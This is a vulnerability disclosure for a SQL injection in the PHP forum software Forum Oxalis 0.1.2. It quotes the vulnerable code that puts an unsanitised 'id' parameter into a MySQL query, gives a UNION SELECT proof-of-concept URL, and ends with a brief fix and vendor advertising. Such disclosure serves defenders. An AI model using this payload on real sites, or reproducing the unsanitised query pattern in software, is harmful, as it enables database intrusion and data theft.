#################################################
Forum Oxalis 0.1.2 <= SQL Injection Vulnerability
#################################################
Discovered by: Jean Pascal Pereira <[email protected]>
Vendor information:
"Forum Oxalis is a minimalis GPL PHP forum using CSS."
Vendor URI: http://developer.berlios.de/projects/forumoxalis/
#################################################
Risk-level: High
The application is prone to a remote SQL injection vulnerability.
-------------------------------------
func.php, line 72:
function lister_messages($id, $page, $parpage)
{
global $mysql_table;
$resu = mysql_query("select * from `$mysql_table` where id=$id");
$nombre_messages = mysql_num_rows($resu);
forum.php, line 7:
$id = $_GET['id'];
forum.php, line 74:
case "message":
lister_messages($id, $page, $reponses_par_page);
$reponse_a_id = $id;
break;
-------------------------------------
Exploit / Proof Of Concept:
http://localhost/ForumOxalis/index.php?id=99999/**/UNION/**/SELECT/**/0x00,version(),0x00,0x00,0x00,0x00,0x00,0x00,0x00&action=message
-------------------------------------
Solution:
Do some input validation.
-------------------------------------
#################################################
# 0day.today [2018-04-13] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation